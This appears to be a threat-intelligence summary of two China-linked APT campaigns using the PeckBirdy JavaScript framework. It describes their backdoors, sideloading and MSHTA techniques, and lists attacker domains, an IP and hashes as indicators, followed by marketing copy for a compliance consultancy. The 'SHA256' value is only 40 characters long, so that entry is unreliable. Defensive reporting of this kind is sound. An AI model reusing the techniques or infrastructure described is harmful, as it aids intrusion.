Main Image

This report details two threat campaigns using the PeckBirdy JavaScript framework, attributed to China-aligned advanced persistent threat (APT) actors. The campaigns, temporarily named SHADOW-VOID-044 and SHADOW-EARTH-045, demonstrate the increasing sophistication and adaptability of these groups.

Analysis of the SHADOW-VOID-044 Campaign

The SHADOW-VOID-044 campaign has been linked to the UNC3569 threat actor, with moderate to high confidence, based on overlapping TTPs and victims.

  • Link to UNC3569: Observed use of the GRAYRABBIT backdoor, previously associated with UNC3569. The Command and Control (C&C) server center.myrnicrosoft.com is the same one used by UNC3569, and the campaign target (Chinese gaming industry) matches the known targets of this actor. The GRAYRABBIT implementation in this campaign uses a DLL sideloading technique combined with the UuidFromStringA PowerShell function.
  • Link to TheWizard: The campaign also deployed the HOLODONUT backdoor. Some HOLODONUT samples connected to the same C&C server (mkdmcdn.com) used by the APT group TheWizard. TheWizard has also used the DarkNimbus backdoor, associated with the Earth Minotaur actor.
  • Stolen Certificate: SHADOW-VOID-044 used a Cobalt Strike sample signed with a certificate stolen from a South Korean game company. This same certificate was used in the BIOPASS RAT campaign, linked to the actor Earth Lusca.
  • Infection Detection Technique: The BIOPASS RAT and MKDOOR campaigns employ a technique to verify infection: they open a local HTTP server on a high port so that a watering hole attack script can scan and confirm the presence of the backdoor on the host.

Analysis of the SHADOW-EARTH-045 Campaign

This campaign focused on a Filipino educational institution in July 2024.

  • TTPs: The threat actor executed an MSHTA command to connect to github.githubassets.net and launch PeckBirdy on a compromised IIS server. Simultaneously, files were downloaded from the IP address 47.238.184.9, previously linked to Earth Baxia (although the attribution to Earth Baxia is low confidence).
  • Global Link: The same PeckBirdy domain and IP address used were also reported in attacks against an African government IT organization.

Conclusions and Detection Challenges

The PeckBirdy framework is an example of the evolution of attack techniques. It uses living-off-the-land binaries (LOLBins) TTPs to bypass traditional endpoint defenses and deploy modular backdoors such as MKDOOR and HOLODONUT.

Detecting malicious JavaScript frameworks like PeckBirdy represents a significant challenge due to:

  • Dynamic code generation.
  • Code injection at runtime.
  • No persistent file artifacts.

References

  • Threat Actors: SHADOW-VOID-044, SHADOW-EARTH-045, UNC3569, TheWizard, Earth Minotaur, Earth Lusca, Earth Baxia.
  • Backdoors and Frameworks: PeckBirdy, GRAYRABBIT, HOLODONUT, MKDOOR, BIOPASS RAT, Cobalt Strike.
  • Indicators of Compromise (IoCs):
    • center.myrnicrosoft.com (C&C UNC3569)
    • mkdmcdn.com (C&C TheWizard) *IP: 47.238.184.9 (Earth Baxia)
    • Domain: oss-cdn.com (SHADOW-VOID-044 server)
    • Certificate (SHA1): bbd2b9b87f968ed88210d4261a1fe30711e8365b (stolen, used in BIOPASS RAT)
    • HASH (SHA256): 162cc325ab7b6e70edb6f4d0bc0e52130c56903f (Cobalt Strike sample)

Confidence

What would we do in these cases?

Compliance Cybersecurity | ISO 27001, PCI DSS and Audits - Comfidentia

Regulatory compliance services: compliance audits, ISO 27001 certification, PCI DSS, training, digital governance and regulatory compliance. Ensure the trust of your clients and maintain an impeccable reputation.

Clear Documentation and Improved Security

We generate detailed and understandable processes for your organization, eliminating dependence on specific personnel and guaranteeing efficiency. Additionally, with our Comprehensive Security Training, you will learn how to protect your infrastructure and raise awareness among your team about the importance of cybersecurity. Optimize your business and strengthen your digital defenses today!

Expert Audits for a Secure Infrastructure

We offer different audit services, such as exhaustive analysis of all risks and vulnerabilities in your architecture or infrastructure, and prioritization of solutions without affecting your business. Additionally, we identify any configuration changes made, whether authorized or unauthorized. With our Architectural Recognition service, we review every endpoint, service, API and communications element to generate accurate diagrams that will give you a clear view of your critical architecture. And if you need more, we also create topological diagrams of your entire network. Don’t put your business at risk, trust us!

Comply with ISO Standards and Strengthen your Security

We accompany you throughout the entire ISO 27001 certification process, from the initial analysis to post-certification maintenance, ensuring continuous compliance. Comply with international standards and strengthen the security of your organization.

PCI DSS Compliance

If your business processes, stores, or transmits payment card data, we help you comply with PCI DSS standards and maintain certification.

Training and Coaching

We train your team in security and compliance through specialized training programs and practical drills.

Digital Governance

We establish governance frameworks for information security, aligned with your business objectives and compliance requirements.